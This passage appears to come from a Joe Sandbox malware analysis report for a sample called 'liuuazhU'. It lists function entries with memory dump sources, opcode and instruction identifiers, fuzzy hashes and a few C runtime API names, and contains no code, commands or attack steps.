                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b92aa25b9918ced7fa90efa2f1161362b6335727ae33612e79fb8cf272db4bd9
                                                                                        • Instruction ID: a73ca78318011375a87a4c86261ea45995c0adcd9c036c43994209710671bf5d
                                                                                        • Opcode Fuzzy Hash: b92aa25b9918ced7fa90efa2f1161362b6335727ae33612e79fb8cf272db4bd9
                                                                                        • Instruction Fuzzy Hash: 00115E39B002049FDB049F59D884A9ABBF9FB9C714F10916AE915E7350CB71AC11CB94
                                                                                        Function 2E4C1AC0 Relevance: .1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea5952a1aac14c85c389f9067ecdfa44abc9024ecc27bb20369267e60cbbe230
                                                                                        • Instruction ID: e2d80314289e16a5032d6e5243f80a3795b310f59d93e42b6f49de039645d0e5
                                                                                        • Opcode Fuzzy Hash: ea5952a1aac14c85c389f9067ecdfa44abc9024ecc27bb20369267e60cbbe230
                                                                                        • Instruction Fuzzy Hash: C021AC34900308DFCB14CF58C848BAABBF5FB58314F00946AE58A8B312E374E905CFA0
                                                                                        Function 2E4C0738 Relevance: .0, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cda88d5117323346fb1dd8a98427706234dac0292348f4fef30ea0ecae64f320
                                                                                        • Instruction ID: 8f28dad2e5857a5c1fdbf0b737854f6f728c0f71d58ae3e4918e8cb8a7c000b9
                                                                                        • Opcode Fuzzy Hash: cda88d5117323346fb1dd8a98427706234dac0292348f4fef30ea0ecae64f320
                                                                                        • Instruction Fuzzy Hash: 3C018636B011146F8B059E999810AAF3BABDBDC690F24C02BF515D7340DE71EC119BA0
                                                                                        Function 28C6D005 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3114473377.0000000028C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 28C6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_28c6d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e09e81388cc996a5b24d4b283138c57bb8a8f4ed8f1c20831ab083fd86c8d3cb
                                                                                        • Instruction ID: 2eb354fc6dd7ae51e6a0be118c9103013a4b13d8e87094440e45a7a65229634f
                                                                                        • Opcode Fuzzy Hash: e09e81388cc996a5b24d4b283138c57bb8a8f4ed8f1c20831ab083fd86c8d3cb
                                                                                        • Instruction Fuzzy Hash: C901526100E3C09ED7124B359894752BFB4EF43224F1DC1DBD9888F1A7C2699849C772
                                                                                        Function 28C6D01D Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3114473377.0000000028C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 28C6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_28c6d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2a3f9aa7271f15cbe363b075642b4406d657ea35d9da71e492ab88e63a63abcd
                                                                                        • Instruction ID: 3ed027c785d25844f26ce3f88ab9a369892e0a2f41037debb781de04cf9a020b
                                                                                        • Opcode Fuzzy Hash: 2a3f9aa7271f15cbe363b075642b4406d657ea35d9da71e492ab88e63a63abcd
                                                                                        • Instruction Fuzzy Hash: 8C01D47100A3509AE7104A27E9C0B57BF98EFC5334F18C53AEE480A286C77AA842C6B1
                                                                                        Function 2E4C2ED8 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a81aa4abea7eb293cb69b5d1112584c5ec625f8d043218db46d42a48b90c0e12
                                                                                        • Instruction ID: 37d5621a93aa41a08b5660347b6e94095f37e4753e3b66cde93930af8cd1f873
                                                                                        • Opcode Fuzzy Hash: a81aa4abea7eb293cb69b5d1112584c5ec625f8d043218db46d42a48b90c0e12
                                                                                        • Instruction Fuzzy Hash: 92F06239310A144B87155E2F9454A2B77DDBFDAE95351107BFE0DC7365DEA0CC028798
                                                                                        Function 2E4C1327 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2bbbaeba9b98cd82211ce76fca6e60d3fd275e1452645cdb758dd309978af432
                                                                                        • Instruction ID: 9febbb6c83105fb7baab290f7542b63ce7ae859e1556a2434e0c0a289cbf8aab
                                                                                        • Opcode Fuzzy Hash: 2bbbaeba9b98cd82211ce76fca6e60d3fd275e1452645cdb758dd309978af432
                                                                                        • Instruction Fuzzy Hash: DCE0C2B04097880ED702E370A985799BF65AB81209F088561A8894A2ABDFAC994E4390
                                                                                        Function 2E4C3F05 Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 339f6825c33659486c707153a34f332baa2c8bc45f8029ac3b0b28105499131b
                                                                                        • Instruction ID: 5068df02f18188ad23522b39686eaf6a16bda6ca806fe57be821c18a465119e6
                                                                                        • Opcode Fuzzy Hash: 339f6825c33659486c707153a34f332baa2c8bc45f8029ac3b0b28105499131b
                                                                                        • Instruction Fuzzy Hash: CAD0673AB40118EFCB049F99E8408DDFBB6FB98221B148156E915A3261CA319961DB64
                                                                                        Function 2E4C1338 Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9cf396fd899176bddf135fc356123f9ea838ec3e34f34297c91a133c70611875
                                                                                        • Instruction ID: fdfe9bf252db557716d9b735bba14f94716c12787889b570f6c16cb5264c349a
                                                                                        • Opcode Fuzzy Hash: 9cf396fd899176bddf135fc356123f9ea838ec3e34f34297c91a133c70611875
                                                                                        • Instruction Fuzzy Hash: 40C012300446084FC705E775D9C6A96B72AA7C02007548530900A0676ADFB8989E46E0

                                                                                        Non-executed Functions

                                                                                        Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 3886058894-0
                                                                                        • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                        • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                        Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89